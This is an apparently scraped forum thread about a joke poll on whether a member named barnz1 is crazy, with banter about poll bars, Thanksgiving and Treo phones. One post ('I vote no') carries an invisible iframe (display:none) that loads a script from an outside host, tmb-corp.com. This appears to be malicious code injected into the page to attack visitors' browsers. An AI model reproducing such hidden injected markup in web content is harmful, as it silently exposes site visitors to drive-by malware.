Voters
15. This poll is closed
  • Yes!, Absolutely

3 20.00%
  • No!

2 13.33%
  • Maybe ?

1 6.67%
  • Techinically, but at least he hasn't switched to a Treo!

9 60.00%
+ Reply to Thread

Is barnz1 Crazy? Vote on it.

At [B] cammoore [B] suggestion.

I fell out of my chair reading this thread... maybe someone should start a real poll...

Sorry Barnz

Is barnz1 Crazy?

I vote no<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Remember, When the long night comes return to the end of the beginning.

:crazya

:wink

The big questions is... what else will happen as we try to amuse ourselves if we have to wait unil next year...

LOL kniteman - I originally said I thought barnz1 was looney - but was only kidding.

I'm glad we have this poll to provide some statistics to mull over. However, my faith in the accuracy of the tabulation is somewhat shaken by the fact that 0% "maybe" yields a yellow bar of positive finite length.

Nomad - how is this possible?

Mod-Blog's SmartPhone Correspondent
    However, my faith in the accuracy of the tabulation is somewhat shaken by the fact that 0% "maybe" yields a yellow bar of positive finite length.
    Nomad - how is this possible?
    You are assuming that non-existence can not be measured. The fact is that you can always show a size and shape for non-existence, when it is surrounded by an existent reality. Consider a hole dug in the ground: it is not a "thing" in the sense that it is filled with something visible (yes, smart-guys, I know it is filled with air) but it has a defineable size and shape.

Good enough? Or too deep so early in a holiday week? :p

Originally posted by nomad7674
    You are assuming that non-existence can not be measured. The fact is that you can always show a size and shape for non-existence, when it is surrounded by an existent reality. Consider a hole dug in the ground: it is not a "thing" in the sense that it is filled with something visible (yes, smart-guys, I know it is filled with air) but it has a defineable size and shape.

Good enough? Or too deep so early in a holiday week? :p
    Hmmm - but dosen't that mean that there would be no bar for 0%? If in your hole analogy, the hole behaved like the "0%" bar in the poll, wouldn't there be a small but perceptible mound of dirt where the hole should be?

Maybe it is too early in any week to contemplate such things that may better be left alone - I am beginning to regret asking - LOL

Perhaps after intake of a large number of calories on Thursday in the form of turkey, stuffing, mashed potatoes and gravy, sweet potatos, brussell sprouts, pumpkin pie (with whipped cream of course) and copious amounts of wine, I will have the strength to continue this discourse. My stuporous state might even lead to comprehension of your comments. :alieneyes

Have a great holiday - we really do have a lot to be thankful for!!

Sorry Barnz

Looks like the vote is in.

76.9 % of the people think you are crazy.

So there is your answer.

Happy Thanksgiving :angel
    Remember, When the long night comes return to the end of the beginning.

Originally posted by kniteman
    Sorry Barnz
    76.9 % of the people think you are crazy.
    Hmm. I guess you can call me Cleopatra, because when I looked at the results, all I noticed was the resounding mandate of support for not buying a Treo!